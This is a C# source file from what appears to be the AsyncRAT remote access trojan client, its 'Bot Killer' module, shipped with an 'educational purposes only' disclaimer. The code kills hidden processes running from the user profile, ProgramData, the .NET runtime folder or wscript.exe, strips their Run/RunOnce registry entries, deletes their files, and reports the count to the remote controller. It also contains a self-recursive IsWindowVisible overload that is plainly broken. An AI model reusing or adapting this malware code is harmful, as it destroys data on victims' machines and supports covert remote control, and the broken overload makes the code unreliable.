AsyncRAT-C-Sharp/AsyncRAT-C#/Client/Handle Packet/HandleBotKiller.cs

using System;
using System.IO;
using System.Diagnostics;
using System.Runtime.InteropServices;
using Microsoft.Win32;
using Client.MessagePack;
using Client.Sockets;

//       │ Author     : NYAN CAT
//       │ Name       : Bot Killer v0.2
//       │ Contact    : https://github.com/NYAN-x-CAT

//       This program Is distributed for educational purposes only.

namespace Client.Handle_Packet
{
   public class HandleBotKiller
    {
        int count = 0;
        public void RunBotKiller()
        {

            foreach (Process p in Process.GetProcesses())
            {
                try
                {
                    string pName = p.MainModule.FileName;
                    if (Inspection(pName))
                        if (!IsWindowVisible(p.MainWindowHandle))
                        {
                            p.Kill();
                            RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\Run", pName);
                            RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\RunOnce", pName);
                            System.Threading.Thread.Sleep(100);
                            File.Delete(pName);
                            count++;
                        }
                }
                catch { }
            }
            if (count > 0)
            {
                MsgPack msgpack = new MsgPack();
                msgpack.ForcePathObject("Packet").AsString = "BotKiller";
                msgpack.ForcePathObject("Count").AsString = count.ToString();
                ClientSocket.BeginSend(msgpack.Encode2Bytes());
            }
        }

        private bool Inspection(string payload)
        {
            if (payload == Process.GetCurrentProcess().MainModule.FileName) return false;
            if (payload.Contains(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData))) return true;
            if (payload.Contains(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile))) return true;
            if (payload.Contains("wscript.exe")) return true;
            if (payload.Contains(RuntimeEnvironment.GetRuntimeDirectory())) return true;
            return false;
        }

        private bool IsWindowVisible(string lHandle)
        {
            return IsWindowVisible(lHandle);
        }

        private void RegistryDelete(string regPath, string payload)
        {
            using (RegistryKey key = Registry.CurrentUser.OpenSubKey(regPath, true))
            {
                if (key != null)
                    foreach (string ValueOfName in key.GetValueNames())
                    {
                        if (key.GetValue(ValueOfName).ToString().Equals(payload))
                            key.DeleteValue(ValueOfName);
                    }
            }
        }

        [DllImport("user32.dll")]
        [return: MarshalAs(UnmanagedType.Bool)]
        static extern bool IsWindowVisible(IntPtr hWnd);
    }
}